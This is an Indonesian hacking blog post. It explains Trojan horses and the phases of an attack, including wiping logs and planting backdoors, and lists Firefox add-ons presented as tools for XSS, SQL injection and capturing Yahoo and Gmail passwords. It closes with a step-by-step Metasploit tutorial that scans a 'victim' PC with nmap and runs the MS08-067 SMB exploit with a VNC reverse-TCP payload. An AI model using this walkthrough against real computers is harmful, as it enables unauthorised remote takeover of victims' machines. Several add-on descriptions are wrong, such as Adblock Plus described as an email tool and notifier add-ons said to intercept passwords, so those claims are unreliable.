Kamis, 12 Desember 2013

Trojan horse

     Postingan kali ini Cybervirburg32 akan menjelaskan tentang sejarah, jenis-jenis dan cara kerja  Trojan horse gitu deh... Ok Saatnya serius menulis.. Penggunaan Trojan Horse tidaklah semata-mata digunakan untuk iseng seperti yang dilakukan oleh virus, oia virus dengan trojan berbeda loh, kerap kali orang awam mengatakan trojan adalah sebuah virus, kalau saya boleh berpendapat trojan adalah sebuah malware bukan virus.
Biasanya trojan digunkan untuk tujuan tertentu, misalnya untuk pencurian data atau memata-matai seseorang. Sebagai contoh, kita menyisipkan trojan pada sebuah email lalu kita kirim kepada rekan kita dan jika rekan kita membuka email tersebut maka trojan dapat tereksekusi dan akan menjalankan tugas yaitu mencuri data dari rekan kita..

Ko, namanya trojan horse?
Kata trojan horse bermula dari perang Troya. Pada jaman dahulu terdapat sebuah kota yang bernama Troy yang tak terkalahkan, meskipun hanya satu kota kecil pasukan Yunani yang memiliki pasukan lebih banyak tidak dapat mengalahkannya. Ide licik pun muncul di otak orang Yunani yang membuat sebuah patung kuda dari kayu yang ukurannya sangat besar, untuk menyimpan pasukan Yunani . Lanjut cerita pasukan Yunanni berpura-pura mengikhlaskan kekalahannya dan memberikan sebuah hadiah patung kuda dari kayu tersebut. Tanpa pikir panjang bangsa Troy menerima hadiah tersebut dengan senang hati, namun ketika di malam hari pasukan Yunani yang berada di dalam patung kuda yang sangat besar itu keluar, dan menyerang pasukan Troy yang sedang tidur lelap hingga membumi hanguskan kota Troy.



Untuk Apa Trojan?
Sebuah trojan dapat membuka pintu belakang dari sebuah sitem komputer sehinnga sang hacker dapat dengan leluasa masuk dan munguasai komputer trojan,

Apa Saja yang Dapat Dilakukan Trojan?
Banyak sekali yang dapat dilakukan dengan malware ini, contohya:
  • Mematikan komputer korban
  • Mengirim pesan
  • Melihat apa yang di kerjakan
  • Merekam semua ketikan keyboard agar sang hacker mendapatkan password
  • Pencuiran dokumen korban
  • dan beratus-ratus kegiatan illegal lainnya,
dan semua kegiatan illegal itu dapat dilakukan jarak jauh, di dalam sebuah jaringan wirelless (hotspot) atau internet.

Bagaimana Cara Trojan Menyebar?
  •  Seorang hacker dapat mengirimkan sebuah trojannya kepada korban melalui email
  • Seorang hacker akan melakukan berbagai cara untuk memasukan program jahat ini kedalam komputer korban. contohnya: Social Enginnering atau teknik penipuan, nah sekarang kita tanya pada diri sendiri. Apakah kita pernah atau sering mendownload software bajakan + cracknya? Nah, inilah kesempatan seorang hacker untuk menyisipkan trojannya pada sebuah software (sering disebut binder "kalau gak salah"). Dan yang lebih parahnya lagi seorang hacker biasanya mendecprypt trojannya agar tidak terdetect oleh sebuah anti virus..
Namun tidak semua software bajakan itu disispkan sebuah trojan, ada sekumpulan pembajak yang terkenal di dunia underground (sarang hacker), mereka menjamin software-software bajakan mereka aman dari malware/trojan dan segala kegiatan yang merugikan pengguna..

Proses Hacking

Menurut Buku hacking exposed pada http://www.hackingexposed.com/, karangnan Stuard McClure, Joel Scambrayndan George Kurtz, proses hacking dibagi menhadi beberapa bagian:
  • Footprinting
Proses mencari informasi tentang korban/target yang sebanyak-banyaknya. Dilakukan dengan mencari data-data melauli internet, surat kabar dan lailn-lain. 
  • Scanning
Proses lanjutan dengan menganalisa servis yang dijalankan server dan router di internet, biasanya dilakukan dengan ping, nmap, dan lain-lain
  • Enumeration
Proses lanjutan dengan mencoba ke mesin target .
  • Gainning Accses
Percobaan pengambil alihan ke target berdasarkan informasi yang didapatkan sebelumnya
  • Escalating Privilage
Meningkatkan hak akses jika telah berhasil untuk msuk kedalam sistem pada server/router
  • Covering Attack
Proses menghapus jejak segala macam log pada server/router agar tidak bisa dilacak
  • Creating Back doors
Menciptakan sebuah jalan rahasia dari sebuah sistem router/server agar bisa memasuki sistem kembali
  • Denial of Service
Segala upaya yang dilakukan oleh seorang cracker untuk menguasai sistem sudah dilakukan tetapi gagal. Maka Cracker mengambil langkah terakhir yaitu Denial of Service yang merupakan wujud keputusannya. Denial of Service lebih dikenal dengan Dos/DDos ya ng menyebabkan server/router restart, bahkan rusak (crash)

Hacking Add-on firefox


   Cybervirburg32 akan menjelelaskan add-on firefox untuk memudahkan kegiatan hacking.
Sekarang cybervirburg32 akan membuat Mozila Firefox  menjadi Senjata Hacker...
Dan saya mengajak teman-teman untuk bersama-sama memodifikasi Mozila Firefox ini agar menjadi sejata yang lebih mematikan lagi... (Add-On dan Program Sendiri)
Disini cybervirburg32 akan menampilkan apa yang saya peroleh dengan addon yang sudah saya includekan.
Meski terasa loading pertama berat namun ketika muncul keren abizz....
Silahkan download add-on plus no malware

https://addons.mozilla.org/en-US/firefox
1. Free Ebook Search : untuk mencari e-book
2. Server Spy : melihat jenis server
3. Domain Finder : mencari data suatu domain
4. Who is : melihat detail situs
5. About This Site : melihat detail situs
6. Tix Now : mematikan timer rapidshare
7. Firebug : mengedit html, css, javascript di virtual hacking
8. XSS-Me : percobaan xss ke situs target
9. SQL Inject Me : percobaan SQL Injection ke situs target
10.Unhide Passwords : melihat password saat kita sniffing di LAN sendiri
11. Tab URL Copier : untuk mencopy paste URL
12. Who Are You? : Mencari data nama seseorang di internet
13. Zoom Fox : memperbesar gambar di web
14. Linkification : melihat http link target
15. XRays : melihat source code dengan tampilannya
16. Amazing Media Browser : mendownload file flash dengan cara hacking
17. Down Them All : mengambil banyak file html diserver target
18. Download Helper : mendownload video hacking
19. Spamborg : untuk pendaftaran email tanpa iklan
20. FasterFox : untuk mempercepat firefox
21. Stylish : menghack stylish di wordpress.com
22. Aardvark : mendelete barner saat melihat source code situs
23. Flashblock : memblock file flash
24. Flash Killer : tidak menampilkan flash agar yang terlihat tulisan saja
25. HostIP.Info.Geolocation : sorot link dan sudah terlihat alamat situs
26. Live HTTP Header : menampilkan http header
27. Fire FTP : sebagai FTP untuk upload file ke situs target
28. View Cookies : untuk melihat cookies
29. Add N Edit Cookies : untuk mengedit cookies
30. IeView : untuk melihat gambar di internet explore
31. Anonymouser : membuat diri tidak terlihat
32. User Agent Switcher : menyamar menjadi browser laen
33. YmNotifier : menyadap password yahoo
34. GMail Notifier : menyadap password gmail
35. Switch Proxy : mengganti proxy biar aman saat hacking
36. Reload Every : dapat digunakan untuk boom email target
37. Adblock Plus : untuk mengakses email dengan 3 profile
38. Hackbar : untuk mengetikkan URL yang sangat panjang
39. Calling ID Advisor : Bedah situs
40. Bandwidth Meter : untuk mengukur bandwidth kita
41. Advanced Dork: untuk pencarian google secara cepat dengan advance operator
42. Cipherfox : memperlihatkan ssl / tls chipper dan key di status bar..
43. Java Console: Untuk menggunakan console via java
44. Copycode: mengijinkan kita untuk memilih text dan mengcopynya secara html
45. Fire Encrypter: memberikan enkripsi / decripsi dan hashing waktu kita hacking
46. FirePHP: mengijinkan untuk masuk firebug console menggunakan simple PHP call..
47. Inline Code Finder For FireBug: Untuk mencari bug menggunakan firebug
48. Page Hacker: menambahkan tombol hack pada halaman yang terpilih
49. Password Hasher: untuk memperlihatkan password
50.Tinyurl Creator: untuk membuat url yang akan kita hack menjadi short
51.SQL Injection : untuk mengetest ketahanan suatu situs terhadap SQL Injection

Nah itulah add-on yang dibutukan untuk kegiatan hacking. untuk tutorialnya bisa anda download disini

Remote mengunakan Metasploit

   
Pada Tutorial hacking kali ini Cybervirburg32 akan jelaskan cara Remote PC dengan Metasploit.Software ini hanya bisa digunakan untuk mengendalikan komputer orang lewat jaringan wireless saja. 
persiapan yg di perlukan antara lain:

1.Metasploit versi berapa aj, karena sekarang udah versi 3.3.4 maka kita akan
memakai versi baru tersebut tool ini bisa di download di sini
2.Komputer dengan internet karena ini harus ada usahakan dalam satu jaringan
karena kita akan meremote komputer lain, untuk OSnya terserah kita
bisa pake linux, windows, unix ( pke backtrack lebih keren ),,tp gw pk windows aj..hehe..
3.Nmap tapi buat metasploit framework udah terinclude langsung Nmapnya
4.Ip dari komputer korban (disini gw cb exploit 192.168.1.31)
5.siapin aj apa yg perlu mnurut bro perlu biat gak bosen nunggu,,

pertama install metasploitnya, klo di windows tinggal next, next dst tapi klo
di linux kita tinggal download source filenya terus terus kita install ( ini buat
metasplot framework v3.2) klo buat v3.3 kita bisa langsung runn filenya

./framework-3.3-linux-i686.run /opt (kasih perm buat di execute dulu)

klo udah selesai semua, tinggal kita mulai mengexploit PC Korban( kali ini cuma
cuma simulasi ).

pertama kita scan range ip yg ada dalam satu jaringan komputer, terserah make tool apa
aja deh yang penting bisa tau ip pc di 1 jaringan,mo pk cain n avbel or netcut jg bisa,,klo gw sih sering make
angry IP Scanner, di sini kita tidak membtuhkan ip public dari korban kita.
Klo udah selesai kita bisa launch metasploitnya

( simulation on micr*soft windows)
klik metasploit console yg ada di start menu
setelah itu akan muncul jendela metasploit


=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 484 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r8002 updated today (2009.12.28)

msf >



kayak gini tampilan metasploitnya.
scan komputer korban dengan Nmap

nmap -v -O -p445 192.168.1.31

command di atas untuk mendeteksi OS korban serta port 445 terbuka apa g.
klo udah selesai kita ke jendela metasploitnya

ketikan di jendela msf(metasploit)

show exploits
fungsinya untuk melihat exploit apa saja yang bisa di gunakan

karena pada simulasi ini saya menggunakan exploit
windows/smb/ms08_067_netapi
exploit ini terjadi pada OS XP SP2 ke bawah

dari msf ketik
use windows/smb/ms08_067_netapi
setelah itu maka kita akan masuk ke exploit ini
akan muncul
msf exploit(ms08_067_netapi) >
dari situ ketik lagi
show payloads

TCP Stager
windows/shell/bind_ipv6_tcp Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp Windows Command Shell, Bind TCP Stager
windows/shell/reverse_ipv6_tcp Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports Windows Command Shell, Reverse All-Port TCP Stager
windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_ipv6_tcp Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports Windows Upload/Execute, Reverse All-Port TCP Stager
windows/vncinject/bind_ipv6_tcp VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_ipv6_tcp VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports VNC Server (Reflective Injection), Reverse All-Port TCP Stager


ini merupakan mode apa yang akan kita gunakan untuk masuk ke komputer
korban, di sini kita akan menggunakan payload

windows/vncinject/reverse_tcp

setelah dari situ kita set pada msf untuk menggunakan payload tsb dgn perintah
set PAYLOAD windows/vncinject/reverse_tcp

setelah itu kita set ip dari target

set RHOST 192.168.1.31 -----> komputer korban

set LHOST 192.168.1.37 -----> komputer kita

klo udah selesai kita tinggal launch exploit di msf

tinggal ketik

exploit
Semoga berhasil......